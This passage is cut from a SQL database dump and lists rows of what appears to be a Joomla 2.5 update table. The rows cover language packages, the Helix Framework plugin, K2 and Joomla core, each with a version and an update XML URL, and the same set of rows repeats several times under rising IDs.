India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2324,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2325,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2326,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2327,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2328,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2329,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2330,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2331,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2332,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2333,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2334,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2335,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2336,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2337,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2338,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2339,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2340,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2341,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2342,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2343,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2344,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2345,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2346,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2347,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2348,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2349,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2350,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2351,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2352,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2353,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2354,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2355,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2356,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2357,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2358,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2359,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2360,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2361,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2362,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2363,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2364,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2365,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2366,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2367,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2368,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2369,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2370,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2371,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2372,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2373,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2374,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2375,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2376,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2377,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2378,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2379,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2380,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2381,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2382,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2383,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2384,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2385,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2386,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2387,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2388,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2389,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2390,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2391,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2392,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2393,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2394,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2395,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2396,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2397,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2398,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2399,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2400,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2401,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2402,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2403,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2404,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2405,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2406,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2407,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2408,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2409,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2410,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2411,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2412,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2413,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2414,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2415,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2416,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2417,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2418,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2419,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2420,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2421,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2422,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2423,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2424,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2425,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2426,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2427,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2428,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2429,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2430,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2431,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2432,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2433,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2434,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2435,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2436,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2437,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2438,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2439,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2440,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2441,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2442,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2443,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2444,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2445,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2446,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(2447,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2448,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2449,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2450,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2451,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2452,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2453,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2454,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2455,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2456,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2457,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2458,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2459,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2460,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2461,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2462,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2463,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2464,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2465,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2466,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2467,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2468,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2469,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2470,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2471,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2472,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2473,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2474,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2475,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2476,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2477,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2478,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2479,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2480,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2481,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2482,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2483,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2484,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2485,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2486,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2487,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2488,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2489,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2490,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2491,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2492,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2493,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2494,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2495,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2496,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2497,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2498,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2499,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2500,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2501,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2502,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(2503,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(2504,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(2505,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(2506,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(2507,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(2508,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(2509,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(2510,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(2511,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(2512,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(2513,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(2514,3,0,0,'Portuguese','','pkg_pt-PT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/pt-PT_details.xml',''),(2515,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(2516,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(2517,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(2518,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(2519,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(2520,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(2521,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(2522,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(2523,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(2524,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(2525,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(2526,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(2527,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(2528,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(2529,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(2530,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(2531,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(2532,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(2533,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(2534,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(2535,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(2536,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(2537,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(2538,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(2539,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(2540,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(2541,3,